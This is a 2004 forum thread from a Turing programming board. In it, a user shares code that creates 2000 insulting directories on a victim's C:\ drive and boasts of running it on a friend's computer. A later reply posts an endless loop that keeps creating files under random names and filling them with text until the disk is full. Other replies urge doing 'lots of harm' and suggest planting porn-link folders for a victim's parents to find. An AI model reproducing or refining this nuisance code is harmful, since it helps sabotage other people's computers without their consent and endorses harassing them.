Programming C, C++, Java, PHP, Ruby, Turing, VB
Computer Science Canada 
Programming C, C++, Java, PHP, Ruby, Turing, VB  

Username:   Password: 
 RegisterRegister   
 create many directories
Index -> Programming, Turing -> Turing Submissions
Goto page 1, 2  Next
View previous topic Printable versionDownload TopicRate TopicSubscribe to this topicPrivate MessagesRefresh page View next topic
Author Message
aliveiswell




PostPosted: Fri Jan 23, 2004 10:59 pm   Post subject: create many directories

Im actually pretty sure I've seen this on this board, but I spent seriously an hour searching - and i couldn't find it. This is probably the most important code you will ever need for a "piss of some person" type of program. I did this to my friend who i gave turing (he doesn't know how to use it though), and it created like 2000 or something directories and really slowed down his computer and pissed him off. it's really simple and i learned like 2 new functions doing it or something. maybe someone can give me bits for initiative to learn things...

code:

var name : string

put "Please enter your name..."
get name
put "Please wait..."

for counter : 1 .. 2000
    Dir.Create ("c:\\" + name + " sucks things" + intstr (counter))
end for

put name + " sucks things, hahahaha, you suck really bad, you will see later..."


there may be a more simple way of doing it, though this is pretty simple
Sponsor
Sponsor
Sponsor
sponsor
Paul




PostPosted: Fri Jan 23, 2004 11:53 pm   Post subject: (No subject)

hehe, I don't think anyone is going to run this as it is... Laughing
shorthair




PostPosted: Sat Jan 24, 2004 12:27 am   Post subject: (No subject)

Save it for the dark side Twisted Evil
Tony




PostPosted: Sat Jan 24, 2004 1:22 am   Post subject: (No subject)

actually the dark side will be more about awarenes rether then abusing/exploits of tech... though there's a very fine line in between the two so who knows.
Latest from compsci.ca/blog: Tony's programming blog. DWITE - a programming contest.
Cervantes




PostPosted: Sat Jan 24, 2004 11:53 am   Post subject: (No subject)

thats terrible.. why would you do that to your FRIEND!?
aliveiswell




PostPosted: Sat Jan 24, 2004 5:01 pm   Post subject: (No subject)

has a friend ever pissed you off really bad? well this guy always does, i give him some disks to burn to me some stuff and he uses it to make backups of his civilization saved games.... a_shole he is...
DanShadow




PostPosted: Sat Jan 24, 2004 7:30 pm   Post subject: (No subject)

Or if your a mean person....create 500 directories with linkes to 500 gay porn sites in them...then place them in a file his/her parents go in, but he doesnt. so like:
Jimmys Porn Folder (loads of porn)
Jimmys Porn Folder2 (loads of porn)
etc.
:twisted:muaha:twisted:
Mazer




PostPosted: Sat Jan 24, 2004 8:20 pm   Post subject: (No subject)

aliveiswell wrote:
has a friend ever pissed you off really bad? well this guy always does, i give him some disks to burn to me some stuff and he uses it to make backups of his civilization saved games.... a_shole he is...

That is evil... brilliantly evil Twisted Evil . I happen to have such a friend, who seems to think I exist merely to act as a server for uploading stupid pictures of his computer. Something like this could come in handy, that or sys.exec that ninjadruglord thing. Laughing
Sponsor
Sponsor
Sponsor
sponsor
aliveiswell




PostPosted: Sat Jan 24, 2004 11:01 pm   Post subject: (No subject)

good idea, but after duplicating almost a gig of a txt file on his comp with a program, he has decided never to open any of the program i send him.
shorthair




PostPosted: Sat Jan 24, 2004 11:10 pm   Post subject: (No subject)

If your gonna make an attack , that wil ldo harm , do lots of harm , its not worth just pestering him , because like you said he aint gonna open a file from you ever again
aliveiswell




PostPosted: Sun Jan 25, 2004 2:44 pm   Post subject: (No subject)

i was trying stuff with sys.exec... very good potential for cool stuff.
shorthair




PostPosted: Sun Jan 25, 2004 2:47 pm   Post subject: (No subject)

avatar is to wide
DanShadow




PostPosted: Sun Jan 25, 2004 5:00 pm   Post subject: (No subject)

aliveiswell...delete (or size down) your avatar....or else. Evil or Very Mad
shorthair




PostPosted: Sun Jan 25, 2004 5:07 pm   Post subject: (No subject)

Your avatar it too big , aliveiswell
Andy




PostPosted: Sun Jan 25, 2004 5:12 pm   Post subject: (No subject)

y would u create blank directories?

code:

var temp, fout :=0
loop
    randint (temp, minint, maxint)
    Dir.Create ("c:\\" + intstr (temp))
    open : fout, "c:\\" + intstr (temp), put
    for i : 1 .. 2000
        put : fout, "haha u suck"
    end for
    close : fout
end loop
Display posts from previous:   
   Index -> Programming, Turing -> Turing Submissions
View previous topic Tell A FriendPrintable versionDownload TopicRate TopicSubscribe to this topicPrivate MessagesRefresh page View next topic

Page 1 of 2  [ 18 Posts ]
Goto page 1, 2  Next
Jump to:   


Style:  
Search: